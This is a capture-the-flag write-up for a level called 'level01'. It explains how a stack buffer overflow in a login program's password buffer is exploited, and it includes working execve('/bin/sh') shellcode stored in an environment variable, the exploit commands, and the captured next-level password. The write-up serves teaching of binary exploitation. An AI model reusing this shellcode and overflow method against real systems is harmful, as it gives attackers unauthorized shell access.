## level01

We have here a program that ask for a username and a password.  
Required username and password are hardcoded in the file, ( "dat_wil" - "admin" )  , but there is no way to unlock anything.  
There is in fact no way to not get the message "bad password", but the password is stored in a buffer on the stack not secured, so we will overflow it.

From ebp, there is on the stack : an int ( 4 bytes ), 48 bytes that seems not used, and the buffer of 16 bytes.
Before the stackframe is established, there is also two push made ( 2 * 4 bytes on the stack), so we can calculate the offset of eip :

4 + 48 + 16 = 68
68 + 4 + 4 = 76
76 + 4 ( old ebp ) = 80

The offset between our buffer and stored eip is 80. We will overflow the password and made it execute a shellcode.

The shellcode could be stored in the buffer itself but it contains a newline unfortunaly, so store it in environment seems to be a better idea

### getenv variable

```bash
#include <stdio.h>
#include <stdlib.h>

int	main(int ac, char **av)
{
	printf("%p\n", getenv("EXPLOIT"));
	return (0);
}
```

```bash
$> export EXPLOIT=`python -c 'print "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'`
$> python -c 'print "dat_wil"; print "A" * 80 + "\x80\xd8\xff\xff"' > /tmp/exploit01
$> cat /tmp/exploit01 - | ./level01
    ********* ADMIN LOGIN PROMPT *********
    Enter Username: verifying username....

    Enter Password:
    nope, incorrect password...


$> cd ../level02
$> cat .pass
    PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
```
